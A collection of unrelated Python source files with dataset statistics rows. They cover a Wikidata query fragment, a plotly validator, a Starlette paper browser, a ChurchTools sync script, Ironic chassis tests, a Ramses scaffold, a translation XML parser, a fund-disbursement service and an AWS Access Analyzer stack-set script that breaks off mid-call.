movie_uri = movie_uri.replace("http://www.wikidata.org/entity/","",1)
mak.actor_uri = actor_uri
mak.movie_uri = movie_uri
mak.movie_name = str(result['movieLabel']['value'])
mak.actor_name = str(result['actorLabel']['value'])
array_out.append(mak)
# print(result['movie']['value'])
def get_wiki_data_actor_movie(year_begin, year_end):
    ret = []
    # range() excludes its stop value; +1 keeps year_end inclusive, matching
    # the inclusive FILTER in _get_wiki_actor_movie_direct
    for y in range(year_begin, year_end + 1):
        _get_wiki_actor_movie_direct(y, y, ret)
    return ret
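# Minimal usage sketch (years are illustrative; each year issues one
# Wikidata SPARQL query, so keep ranges small):
#
#   pairs = get_wiki_data_actor_movie(1999, 2000)
#   print(pairs[0].movie_name, "-", pairs[0].actor_name)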
class DataSource:
pass
| 30.183727 | 160 | 0.608739 | 3,008 | 23,000 | 4.542886 | 0.148604 | 0.008708 | 0.015368 | 0.015807 | 0.440322 | 0.374094 | 0.305159 | 0.281595 | 0.259129 | 0.214709 | 0 | 0.010045 | 0.268522 | 23,000 | 761 | 161 | 30.22339 | 0.802187 | 0.172565 | 0 | 0.322785 | 0 | 0.004219 | 0.170027 | 0.011757 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037975 | false | 0.00211 | 0.054852 | 0 | 0.130802 | 0.004219 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140b9b0b97e871cc880c6a62e7358c9920469b5f | 494 | py | Python | plotly/validators/choropleth/_locationmode.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/choropleth/_locationmode.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/choropleth/_locationmode.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class LocationmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name='locationmode', parent_name='choropleth', **kwargs
):
super(LocationmodeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
role='info',
values=['ISO-3', 'USA-states', 'country names'],
**kwargs
)
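# Hedged usage sketch: validators like this normally run inside plotly's
# figure-building machinery rather than being called directly. Assuming the
# EnumeratedValidator API, a direct call might look like:
#
#   v = LocationmodeValidator()
#   v.validate_coerce('ISO-3')       # accepted enumerated value
#   v.validate_coerce('bogus-mode')  # would raise a ValueError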
| 29.058824 | 78 | 0.62753 | 45 | 494 | 6.466667 | 0.622222 | 0.103093 | 0.171821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002747 | 0.263158 | 494 | 16 | 79 | 30.875 | 0.796703 | 0 | 0 | 0 | 0 | 0 | 0.117409 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140d58b062f440d69f4d9438bb9af96e8e79b82f | 5,453 | py | Python | server.py | rosinality/arxiv-sanity | 8905f2ed8dcd873b216624705f26cdd4693bf499 | [
"MIT"
] | 3 | 2019-11-14T12:43:58.000Z | 2021-01-10T15:29:21.000Z | server.py | rosinality/arxiv-sanity | 8905f2ed8dcd873b216624705f26cdd4693bf499 | [
"MIT"
] | null | null | null | server.py | rosinality/arxiv-sanity | 8905f2ed8dcd873b216624705f26cdd4693bf499 | [
"MIT"
] | 1 | 2020-06-16T16:58:52.000Z | 2020-06-16T16:58:52.000Z | import re
import logging
from math import ceil
from datetime import datetime
from starlette.applications import Starlette
from starlette.responses import PlainTextResponse
from starlette.templating import Jinja2Templates
from starlette.staticfiles import StaticFiles
import uvicorn
from gensim.summarization.summarizer import summarize
from model import Papers, database
templates = Jinja2Templates(directory='templates')
app = Starlette(debug=False)
app.mount('/static', StaticFiles(directory='static'), name='static')
def unix_to_date(unixtime):
return datetime.utcfromtimestamp(unixtime).strftime('%Y-%m-%d')
@app.route('/mark/{id}/{state}')
async def mark(request):
state_map = {'none': 0, 'read': 1, 'later': 2}
state = request.path_params['state']
id = request.path_params['id']
query = Papers.update(state=state_map[state]).where(Papers.id == id)
query.execute()
return PlainTextResponse(state)
def make_page_list(page, min_page, max_page, expected_length):
    """Build a pagination strip of roughly `expected_length` page numbers
    centred on `page`, with '...' gaps and the first/last page pinned."""
    # window of page numbers centred on the current page
    left_margin = max(min_page, page - (expected_length - 1) // 2)
    right_margin = min(max_page, page + (expected_length - 1) // 2) + 1
    pages = list(range(left_margin, right_margin))
    # if the window was clipped on the left, extend it to the right
    if len(pages) < expected_length:
        pages.extend(
            range(right_margin, min(max_page, right_margin + expected_length - len(pages)))
        )
    # if the window was clipped on the right, pad it on the left
    if pages:
        left_fill_start = max(min_page, left_margin - expected_length + len(pages))
        pages = list(range(left_fill_start, pages[0])) + pages
    # pin the first page, with an ellipsis when there is a gap
    if pages and pages[0] > 1:
        if pages[0] > 2:
            pages = ['...'] + pages
        pages = [1] + pages
    if not pages:
        pages = [1]
    # pin the last page, with an ellipsis when there is a gap
    if pages[-1] < max_page:
        if pages[-1] < max_page - 1:
            pages.append('...')
        pages.append(max_page)
    return pages
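# Worked example (computed from the logic above; shape is illustrative):
#   make_page_list(5, 1, 20, expected_length=5)
#   -> [1, '...', 3, 4, 5, 6, 7, '...', 20]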
def get_page(request, mark='all', page=1):
paper_per_page = 10
state_map_rev = {'none': 0, 'read': 1, 'later': 2}
state_map = {0: 'none', 1: 'read', 2: 'later'}
    keyword = request.query_params.get('search')
    keywords = keyword.split() if keyword else None
# papers = Papers.select(Papers, fn.COUNT(SQL('*')).over().alias('n_paper'))
papers = Papers.select()
if mark != 'all':
papers = papers.where(Papers.state == state_map_rev[mark])
if keywords is not None:
for keyword in keywords:
papers = papers.where(Papers.title ** f'%{keyword}%')
'''if len(papers) > 0:
n_paper = papers[0].n_paper
else:
n_paper = 0'''
n_paper = papers.count()
max_page = ceil(n_paper / paper_per_page)
papers = papers.order_by(Papers.updated.desc()).paginate(page, paper_per_page)
records = []
for paper in papers.iterator():
summary = paper.summary.replace('\n', ' ')
        try:
            summary_short = summarize(summary)
        except (ValueError, TypeError):
            # gensim's summarize() raises on input it cannot handle (e.g. a
            # very short abstract); fall back to the full text
            summary_short = summary
title = paper.title
if keywords is not None:
for keyword in keywords:
title = re.sub(
f'({keyword})',
r'<span class="found">\1</span>',
title,
flags=re.IGNORECASE,
)
records.append(
{
'id': paper.id,
'title': title,
'category': paper.category,
'summary': paper.summary,
'summary_short': summary_short,
'authors': paper.authors,
'version': paper.version,
'published': unix_to_date(paper.published),
'updated': unix_to_date(paper.updated),
'state': state_map[paper.state],
'new': paper.new,
}
)
pages = make_page_list(page, 1, max_page, expected_length=5)
del papers
search_query = ''
if keywords is not None:
search_query = '?search=' + request.query_params['search']
# database.close_all()
return templates.TemplateResponse(
'index.html',
{
'request': request,
'n_paper': n_paper,
            'searched': keyword is not None,
'search_query': search_query,
'papers': records,
'total_page': max_page,
'current_page': page,
'mark': mark,
'pagination': pages,
'prev_page': max(1, page - 1),
'next_page': max(1, min(max_page, page + 1)),
},
)
@app.route('/')
@app.route('/{mark}')
@app.route('/{page:int}')
@app.route('/{mark}/{page:int}')
async def index(request):
mark = request.path_params.get('mark', 'all')
page = request.path_params.get('page', 1)
response = get_page(request, mark, page)
return response
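# Hedged examples of URLs the routes above accept (values illustrative):
#   /                    -> all papers, page 1
#   /read/2              -> page 2 of papers marked 'read'
#   /3?search=attention  -> page 3 of papers whose titles match 'attention'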
@app.on_event('shutdown')
def shutdown():
database.close()
if __name__ == '__main__':
logger = logging.getLogger('gensim')
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.ERROR)
uvicorn.run(app, host='0.0.0.0', port=8000)
| 26.342995 | 84 | 0.575096 | 642 | 5,453 | 4.733645 | 0.247664 | 0.023034 | 0.029615 | 0.010859 | 0.125041 | 0.090819 | 0.039487 | 0.025666 | 0.025666 | 0 | 0 | 0.013468 | 0.291949 | 5,453 | 206 | 85 | 26.470874 | 0.773634 | 0.017422 | 0 | 0.118881 | 0 | 0 | 0.084743 | 0.00437 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027972 | false | 0 | 0.076923 | 0.006993 | 0.13986 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140f20997a32115cc05697358fa597c854b552ef | 1,061 | py | Python | syncAlleMitarbeiter.py | wulmer/churchtools-automation | 8fa7e3d96c42a6a03ffc37a269ba3b95a856d83e | [
"MIT"
] | null | null | null | syncAlleMitarbeiter.py | wulmer/churchtools-automation | 8fa7e3d96c42a6a03ffc37a269ba3b95a856d83e | [
"MIT"
] | null | null | null | syncAlleMitarbeiter.py | wulmer/churchtools-automation | 8fa7e3d96c42a6a03ffc37a269ba3b95a856d83e | [
"MIT"
] | null | null | null | import os
from churchtools import ChurchToolsApi
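# This script expects API_BASE_URL and ADMIN_TOKEN in the environment, e.g.
# (values are illustrative assumptions):
#   API_BASE_URL=https://example.church.tools ADMIN_TOKEN=secret python syncAlleMitarbeiter.py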
if __name__ == "__main__":
ct = ChurchToolsApi(os.environ["API_BASE_URL"], os.environ["ADMIN_TOKEN"])
all_members_group_id = list(ct.get_groups(query="Auto-Gruppe: Alle Mitarbeiter"))[
0
]["id"]
member_status_ids = [s["id"] for s in ct.get_statuses() if s["isMember"]]
member_persons = ct.get_persons(status_ids=member_status_ids)
member_person_ids = {p["id"] for p in member_persons}
existing_group_members = ct.get_group_members(group_id=all_members_group_id)
existing_group_member_ids = {p["personId"] for p in existing_group_members}
to_add = member_person_ids - existing_group_member_ids
to_remove = existing_group_member_ids - member_person_ids
if not to_add and not to_remove:
print("Nothing to do today :-)")
for p in to_add:
print(f"Adding #{p}")
ct.add_to_group(who=p, to=all_members_group_id)
for p in to_remove:
print(f"Removing #{p}")
ct.remove_from_group(who=p, from_=all_members_group_id)
| 34.225806 | 86 | 0.708765 | 165 | 1,061 | 4.157576 | 0.327273 | 0.087464 | 0.102041 | 0.099125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001155 | 0.183789 | 1,061 | 30 | 87 | 35.366667 | 0.790993 | 0 | 0 | 0 | 0 | 0 | 0.121583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140fe5f12606142c8580449bd83609ef34673f2a | 3,308 | py | Python | ironicclient/tests/functional/osc/v1/test_baremetal_chassis_basic.py | sapcc/python-ironicclient | 8dcbf5b6d0bc2c2dc3881dbc557e2e403e2fe2b4 | [
"Apache-2.0"
] | 41 | 2015-01-29T20:10:48.000Z | 2022-01-26T10:04:28.000Z | ironicclient/tests/functional/osc/v1/test_baremetal_chassis_basic.py | sapcc/python-ironicclient | 8dcbf5b6d0bc2c2dc3881dbc557e2e403e2fe2b4 | [
"Apache-2.0"
] | null | null | null | ironicclient/tests/functional/osc/v1/test_baremetal_chassis_basic.py | sapcc/python-ironicclient | 8dcbf5b6d0bc2c2dc3881dbc557e2e403e2fe2b4 | [
"Apache-2.0"
] | 46 | 2015-01-19T17:46:52.000Z | 2021-12-19T01:22:47.000Z | # Copyright (c) 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ironicclient.tests.functional.osc.v1 import base
class BaremetalChassisTests(base.TestCase):
"""Functional tests for baremetal chassis commands."""
def setUp(self):
super(BaremetalChassisTests, self).setUp()
self.chassis = self.chassis_create()
def test_list(self):
"""Check baremetal chassis list command.
Test steps:
1) Create baremetal chassis in setUp.
2) List baremetal chassis.
3) Check chassis description and UUID in chassis list.
"""
chassis_list = self.chassis_list()
self.assertIn(self.chassis['uuid'],
[x['UUID'] for x in chassis_list])
self.assertIn(self.chassis['description'],
[x['Description'] for x in chassis_list])
def test_show(self):
"""Check baremetal chassis show command.
Test steps:
1) Create baremetal chassis in setUp.
2) Show baremetal chassis.
3) Check chassis in chassis show.
"""
chassis = self.chassis_show(self.chassis['uuid'])
self.assertEqual(self.chassis['uuid'], chassis['uuid'])
self.assertEqual(self.chassis['description'], chassis['description'])
def test_delete(self):
"""Check baremetal chassis delete command.
Test steps:
1) Create baremetal chassis in setUp.
2) Delete baremetal chassis by UUID.
3) Check that chassis deleted successfully.
"""
output = self.chassis_delete(self.chassis['uuid'])
self.assertIn('Deleted chassis {0}'.format(self.chassis['uuid']),
output)
self.assertNotIn(self.chassis['uuid'], self.chassis_list(['UUID']))
def test_set_unset_extra(self):
"""Check baremetal chassis set and unset commands.
Test steps:
1) Create baremetal chassis in setUp.
2) Set extra data for chassis.
3) Check that baremetal chassis extra data was set.
4) Unset extra data for chassis.
5) Check that baremetal chassis extra data was unset.
"""
extra_key = 'ext'
extra_value = 'testdata'
self.openstack('baremetal chassis set --extra {0}={1} {2}'
.format(extra_key, extra_value, self.chassis['uuid']))
show_prop = self.chassis_show(self.chassis['uuid'], ['extra'])
self.assertEqual(extra_value, show_prop['extra'][extra_key])
self.openstack('baremetal chassis unset --extra {0} {1}'
.format(extra_key, self.chassis['uuid']))
show_prop = self.chassis_show(self.chassis['uuid'], ['extra'])
self.assertNotIn(extra_key, show_prop['extra'])
| 38.022989 | 78 | 0.635429 | 405 | 3,308 | 5.120988 | 0.28642 | 0.106075 | 0.072324 | 0.048216 | 0.299421 | 0.260366 | 0.182739 | 0.147059 | 0.147059 | 0.127772 | 0 | 0.011837 | 0.259371 | 3,308 | 86 | 79 | 38.465116 | 0.834694 | 0.422612 | 0 | 0.064516 | 0 | 0 | 0.13357 | 0 | 0 | 0 | 0 | 0 | 0.258065 | 1 | 0.16129 | false | 0 | 0.032258 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
14104a886f5961b0db75535cef7241d695e8b7c3 | 1,082 | py | Python | ramses/scaffolds/__init__.py | timgates42/ramses | ea2e1e896325b7256cdf5902309e05fd98e0c14c | [
"Apache-2.0"
] | 178 | 2016-01-29T10:59:56.000Z | 2021-09-17T18:28:24.000Z | ramses/scaffolds/__init__.py | timgates42/ramses | ea2e1e896325b7256cdf5902309e05fd98e0c14c | [
"Apache-2.0"
] | 35 | 2015-03-31T19:52:23.000Z | 2016-01-11T22:44:30.000Z | ramses/scaffolds/__init__.py | timgates42/ramses | ea2e1e896325b7256cdf5902309e05fd98e0c14c | [
"Apache-2.0"
] | 24 | 2016-02-12T02:38:28.000Z | 2020-06-20T23:35:38.000Z | import os
import subprocess
from six import moves
from pyramid.scaffolds import PyramidTemplate
class RamsesStarterTemplate(PyramidTemplate):
_template_dir = 'ramses_starter'
summary = 'Ramses starter'
def pre(self, command, output_dir, vars):
dbengine_choices = {'1': 'sqla', '2': 'mongodb'}
vars['engine'] = dbengine_choices[moves.input("""
Which database backend would you like to use:
(1) for SQLAlchemy/PostgreSQL, or
(2) for MongoEngine/MongoDB?
[default is '1']: """) or '1']
        if vars['package'] == 'site':
            raise ValueError("""
"site" conflicts with Python's standard-library `site` module.
Please use a different project name. """)
def post(self, command, output_dir, vars):
os.chdir(str(output_dir))
subprocess.call('pip install -r requirements.txt', shell=True)
subprocess.call('pip install nefertari-{}'.format(vars['engine']),
shell=True)
msg = """Goodbye boilerplate! Welcome to Ramses."""
self.out(msg)
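# Hedged usage sketch: with this scaffold installed via Pyramid's entry
# points, project creation would typically look like (name illustrative):
#   pcreate -s ramses_starter my_project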
| 31.823529 | 74 | 0.61183 | 123 | 1,082 | 5.317073 | 0.626016 | 0.041284 | 0.051988 | 0.061162 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007557 | 0.266174 | 1,082 | 33 | 75 | 32.787879 | 0.816121 | 0 | 0 | 0 | 0 | 0 | 0.399261 | 0.020333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.16 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1413cca6261680634828c3e223b5596d39503334 | 2,220 | py | Python | Translations/parse.py | Bluefissure/RainbowMage.ActLocalizer | a63cca327eb4433382039fe338037062af962903 | [
"MIT"
] | 19 | 2019-06-18T16:05:27.000Z | 2021-12-09T08:48:18.000Z | Translations/parse.py | Bluefissure/RainbowMage.ActLocalizer | a63cca327eb4433382039fe338037062af962903 | [
"MIT"
] | null | null | null | Translations/parse.py | Bluefissure/RainbowMage.ActLocalizer | a63cca327eb4433382039fe338037062af962903 | [
"MIT"
] | 1 | 2020-08-24T15:35:56.000Z | 2020-08-24T15:35:56.000Z | from xml.dom.minidom import parse
import json, re
import xml.dom.minidom
import codecs
from collections import defaultdict
def readfrom_xml(xml_file, language, textdict=None):
if not textdict:
textdict = defaultdict(dict)
DOMTree = xml.dom.minidom.parse(xml_file)
collection = DOMTree.documentElement
if collection.hasAttribute("Form"):
print("Element Type:{}".format(collection.getAttribute("Form")))
texts = collection.getElementsByTagName("Control")
for text in texts:
unique_key = "{}:{}".format(text.getAttribute("ControlPath"), text.getAttribute("UniqueName"))
if text.hasAttribute("Text") and text.hasAttribute("UniqueName"):
                textdict[unique_key].update({
                    language: text.getAttribute("Text"),
                })
elif collection.getElementsByTagName("TreeViewTranslationEntry"):
entries = collection.getElementsByTagName("TreeViewTranslationEntry")
for entry in entries:
unique_key = "{}:{}".format("TreeViewTranslationEntry", entry.getAttribute("Original"))
if entry.hasAttribute("Original"):
                textdict[unique_key].update({
                    language: entry.firstChild.data,
                })
return textdict
def parse_file(filename):
textdict_en = readfrom_xml("en-US/{}".format(filename), "en")
textdict_cn = readfrom_xml("zh-CN/{}".format(filename), "cn", textdict_en)
output_set = set()
with codecs.open(filename.replace(".xml",".txt"), "w", "utf8") as f:
for (_, value) in textdict_cn.items():
if "cn" in value and "en" in value:
en_str = value["en"].replace("\r","").replace("\n","\\n").strip()
cn_str = value["cn"].replace("\r","").replace("\n","\\n").strip()
if not en_str or not cn_str or en_str in output_set or not re.search(r"[\u4e00-\u9fa5]", cn_str):
continue
f.write("{}|{}\n".format(en_str, cn_str))
output_set.add(en_str)
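# Each output line pairs the English string with its translation, e.g.
# (illustrative): "Start Time|开始时间". Embedded newlines are escaped to a
# literal "\n" so each entry stays on one line.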
if __name__ == "__main__":
for file in ["FormActMain.xml", "ConfigTreeView.xml"]:
parse_file(file)
print("Parsed {}".format(file)) | 46.25 | 113 | 0.609009 | 246 | 2,220 | 5.349594 | 0.337398 | 0.018997 | 0.029635 | 0.028875 | 0.079027 | 0.033435 | 0 | 0 | 0 | 0 | 0 | 0.003571 | 0.243243 | 2,220 | 48 | 114 | 46.25 | 0.779762 | 0 | 0 | 0.088889 | 0 | 0 | 0.132373 | 0.032418 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.111111 | 0 | 0.177778 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1414d6a7f39b6d6d2fa543619d6402804985df1f | 3,359 | py | Python | sme_financing/main/service/fund_disbursement_service.py | BuildForSDG/team-214-backend | f1aff9c27d7b7588b4bbb2bc68956b35051d4506 | [
"MIT"
] | 1 | 2020-05-20T16:32:33.000Z | 2020-05-20T16:32:33.000Z | sme_financing/main/service/fund_disbursement_service.py | BuildForSDG/team-214-backend | f1aff9c27d7b7588b4bbb2bc68956b35051d4506 | [
"MIT"
] | 23 | 2020-05-19T07:12:53.000Z | 2020-06-21T03:57:54.000Z | sme_financing/main/service/fund_disbursement_service.py | BuildForSDG/team-214-backend | f1aff9c27d7b7588b4bbb2bc68956b35051d4506 | [
"MIT"
] | 1 | 2020-05-18T14:18:12.000Z | 2020-05-18T14:18:12.000Z | from datetime import datetime
from sqlalchemy.exc import SQLAlchemyError
from sme_financing.main import db
from ..models.fund_disbursement import FundDisbursement
from ..service.funding_project_service import get_funding_project_by_id
def update():
db.session.commit()
def commit_changes(data):
db.session.add(data)
update()
def save_disbursement(data):
funding_project = get_funding_project_by_id(id=data["funding_project_id"])
if funding_project:
new_disburse = FundDisbursement(
description=data["description"],
status=data["status"],
disbursement_date=datetime.strptime(
data["disbursement_date"], "%Y-%m-%d"
).date(),
bank_account_details_from=data["bank_account_details_from"],
bank_account_details_to=data["bank_account_details_to"],
cheque_details=data["cheque_details"],
)
new_disburse.funding_project_id = funding_project
try:
commit_changes(new_disburse)
response_object = {
"status": "success",
"message": "Funding disbursement successfully added!",
}
return response_object, 201
except SQLAlchemyError as error:
response_object = {
"status": "failure",
"message": str(error),
}
return response_object, 500
else:
        response_object = {
            "status": "failure",
            "message": "Invalid funding project id!",
        }
return response_object, 500
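# Hedged sketch of the payload save_disbursement expects; the keys mirror the
# fields read above, the values are illustrative assumptions:
#
#   save_disbursement({
#       "funding_project_id": 1,
#       "description": "First tranche",
#       "status": "pending",
#       "disbursement_date": "2020-06-01",
#       "bank_account_details_from": "ACME Bank 000-111",
#       "bank_account_details_to": "SME Bank 222-333",
#       "cheque_details": "CHQ-0001",
#   })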
def update_fund_disbursement(data, disbursement_data):
if data.get("description"):
disbursement_data.description = data["description"]
if data.get("status"):
disbursement_data.status = data["status"]
if data.get("bank_account_details_from"):
disbursement_data.bank_account_details_from = data["bank_account_details_from"]
if data.get("bank_account_details_to"):
disbursement_data.bank_account_details_to = data["bank_account_details_to"]
funding_project = get_funding_project_by_id(id=data["funding_project_id"])
if not funding_project:
response_object = {"status": "failure", "message": "Update was not successful"}
return response_object, 404
else:
try:
update()
response_object = {"status": "success", "message": "Successfully updated."}
return response_object, 201
except SQLAlchemyError as err:
db.session.rollback()
response_object = {"status": "error", "message": str(err)}
return response_object, 400
def delete_disbursement(fund_disbursement):
try:
db.session.delete(fund_disbursement)
update()
response_object = {
"status": "success",
"message": "Funding disbursement successfully deleted.",
}
return response_object, 204
except SQLAlchemyError as e:
db.session.rollback()
response_object = {"status": "error", "message": str(e)}
return response_object, 500
def get_fund_disbursement_by_id(fund_disbursement_id):
return FundDisbursement.query.filter_by(id=fund_disbursement_id).first()
def get_all_fund_disbursements():
return FundDisbursement.query.all()
| 31.101852 | 88 | 0.646621 | 355 | 3,359 | 5.822535 | 0.216901 | 0.10837 | 0.087083 | 0.063861 | 0.473633 | 0.352201 | 0.303822 | 0.259313 | 0.19642 | 0.057088 | 0 | 0.009604 | 0.256029 | 3,359 | 107 | 89 | 31.392523 | 0.817527 | 0 | 0 | 0.304878 | 0 | 0 | 0.173564 | 0.04287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085366 | false | 0 | 0.060976 | 0.02439 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
141e2840866cc4a5199ed1f46de24c5823d73ae2 | 940 | py | Python | sendmail/helpers.py | hmif-itb/hmif-send-mail | 628e283d7de06b132fe72af97b76104ea5ff8c88 | [
"MIT"
] | null | null | null | sendmail/helpers.py | hmif-itb/hmif-send-mail | 628e283d7de06b132fe72af97b76104ea5ff8c88 | [
"MIT"
] | null | null | null | sendmail/helpers.py | hmif-itb/hmif-send-mail | 628e283d7de06b132fe72af97b76104ea5ff8c88 | [
"MIT"
] | null | null | null | import json
import yaml
import csv
def file_to_raw(filename):
with open(filename, "r") as file:
f = file.read()
return f
def dump_to_json(data, filename):
with open(filename, "w", encoding="utf8") as file:
json.dump(data, file, ensure_ascii=False)
def read_csv(filename):
rows = []
with open(filename, newline="") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",", quotechar=" ")
for row in csv_reader:
rows.append(row)
return rows
def get_csv_headers(filename):
with open(filename, newline="") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",", quotechar=" ")
for row in csv_reader:
return row
def yaml_parser(yaml_file):
with open(yaml_file, "r") as stream:
try:
data = yaml.safe_load(stream)
return data
except yaml.YAMLError as exc:
print(exc)
| 23.5 | 71 | 0.611702 | 127 | 940 | 4.370079 | 0.346457 | 0.097297 | 0.115315 | 0.12973 | 0.331532 | 0.331532 | 0.331532 | 0.331532 | 0.331532 | 0.331532 | 0 | 0.001471 | 0.276596 | 940 | 39 | 72 | 24.102564 | 0.814706 | 0 | 0 | 0.206897 | 0 | 0 | 0.011702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.103448 | 0 | 0.413793 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
141e6c1e91f0326ea6e6f4822ced15004bab074a | 2,828 | py | Python | access-analyzer/enablement/create-account-analyzer-stack-set.py | lulukelu/aws-iam-permissions-guardrails | cae485e3d8589c85f55c50c442ce47916345e00d | [
"Apache-2.0"
] | 88 | 2020-04-02T02:56:27.000Z | 2022-03-18T13:22:02.000Z | access-analyzer/enablement/create-account-analyzer-stack-set.py | lulukelu/aws-iam-permissions-guardrails | cae485e3d8589c85f55c50c442ce47916345e00d | [
"Apache-2.0"
] | 45 | 2020-06-26T11:11:28.000Z | 2021-08-17T15:31:47.000Z | access-analyzer/enablement/create-account-analyzer-stack-set.py | lulukelu/aws-iam-permissions-guardrails | cae485e3d8589c85f55c50c442ce47916345e00d | [
"Apache-2.0"
] | 32 | 2020-04-02T02:56:28.000Z | 2021-12-20T18:53:04.000Z | import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import argparse
import boto3
from botocore.waiter import SingleWaiterConfig, Waiter
excluded_regions=[]
parser = argparse.ArgumentParser()
parser.add_argument("--excluded_regions","-excluded_regions",help="Regions to exclude as comma separated list, such as those not activate by your organization and unable to deploy",required=False)
args = parser.parse_args()
logger.info(f"args {args}")
if args.excluded_regions:
logger.info(f"Excluded regions are: {args.excluded_regions}")
excluded_regions=args.excluded_regions.split(",")
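# Hedged CLI sketch (region names below are illustrative assumptions):
#   python create-account-analyzer-stack-set.py --excluded_regions ap-east-1,me-south-1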
waiter_config = SingleWaiterConfig({
'delay': 10,
'operation': 'DescribeStackSetOperation',
'maxAttempts': 360,
'acceptors': [
{
'argument': 'StackSetOperation.Status',
'expected': 'SUCCEEDED',
'matcher': 'path',
'state': 'success'
},
{
'argument': 'StackSetOperation.Status',
'expected': 'FAILED',
'matcher': 'path',
'state': 'failure'
},
{
'argument': 'StackSetOperation.Status',
'expected': 'STOPPED',
'matcher': 'path',
'state': 'failure'
},
{
'expected': 'ValidationError',
'matcher': 'error',
'state': 'failure'
}
]
})
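# The custom waiter above polls DescribeStackSetOperation every 10 seconds,
# up to 360 attempts (~1 hour), until the stack-set operation succeeds,
# fails, or is stopped.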
cloudformation_client=boto3.client("cloudformation")
cfn=None
with open('account-analyzer.yaml', 'r') as myfile:
cfn = myfile.read()
StackSetName="access-analyzer-account"
response=cloudformation_client.create_stack_set(
StackSetName=StackSetName,
Description="Access Analyzer Account",
TemplateBody=cfn,
Capabilities=["CAPABILITY_IAM","CAPABILITY_NAMED_IAM"],
